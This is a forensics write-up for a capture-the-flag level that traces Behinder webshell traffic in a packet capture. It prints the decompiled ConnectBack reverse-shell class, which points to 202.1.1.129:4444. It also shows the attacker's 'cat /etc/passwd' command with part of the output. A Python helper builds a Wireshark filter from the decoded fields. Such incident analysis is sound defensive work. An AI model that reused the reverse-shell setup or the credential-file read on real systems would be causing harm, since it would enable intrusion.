Level 11

Challenge description

Level description: What is the first command the attacker executed over the reverse connection?

Flag

ip.addr == 202.1.1.66 && http.request.method == "POST" && http.request.uri contains "s74e7vwmzs21d5x6"

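The password and key were already recovered from the first data stream. Using the [Blue Team Analysis Toolbox (蓝队分析工具箱) v1.08](https://github.com/abc123info/BlueTeamTools/releases/tag/v1.08) on the request body yields BehinderDecode.class.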

tcp.stream eq 283

eBJS9iX1FmWXGh6C1a392iVa7RtT2YdDZ0Ljvu3JpUeSaNPquz+aDEJrwQJKNe …… e4bAOoeaJFutTh/Z/ri4tVAGLZpwNjbQqA=

Open BehinderDecode.class with jadx-gui:

/* loaded from: BehinderDecode.class */
public class ConnectBack extends ClassLoader implements Runnable {
    public static String type = "shell";
    public static String ip = "202.1.1.129";
    public static String port = "4444";
    private ServletRequest Request;
    private ServletResponse Response;
    private HttpSession Session;
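
The static fields above name the connect-back endpoint, which is what to pivot on in the capture. The following is an added example, not part of the original write-up or of BlueTeamTools: it reads the `ip` and `port` fields from jadx output and builds a Wireshark display filter for that endpoint. The function names are hypothetical, and the use of this filter to locate the follow-up stream is an assumption.

```python
import ipaddress
import re

# Constructed sample: the field declarations as jadx-gui printed them on this page.
DECOMPILED = '''
public class ConnectBack extends ClassLoader implements Runnable {
    public static String type = "shell";
    public static String ip = "202.1.1.129";
    public static String port = "4444";
'''

# Matches: static String <name> = "<literal>";
FIELD_RE = re.compile(r'static\s+String\s+(\w+)\s*=\s*"([^"]*)"\s*;')


def extract_fields(java_source):
    """Return {name: value} for every static String field with a literal value."""
    return dict(FIELD_RE.findall(java_source))


def connect_back_filter(java_source):
    """Build a Wireshark display filter for the connect-back endpoint.

    Raises ValueError when ip/port are missing or malformed, so a bad decode
    is not silently turned into a filter that matches nothing.
    """
    fields = extract_fields(java_source)
    try:
        ip = ipaddress.ip_address(fields["ip"])  # ValueError on a bad address
        port = int(fields["port"])               # ValueError on a non-number
    except KeyError as exc:
        raise ValueError(f"field {exc} not found in decompiled source") from None
    if not 0 < port < 65536:
        raise ValueError(f"port out of range: {port}")
    family = "ip" if ip.version == 4 else "ipv6"
    return f"{family}.addr == {ip} && tcp.port == {port}"


if __name__ == "__main__":
    print(extract_fields(DECOMPILED))
    print(connect_back_filter(DECOMPILED))
```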

Continuing with the next stream:

tcp.stream eq 284

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin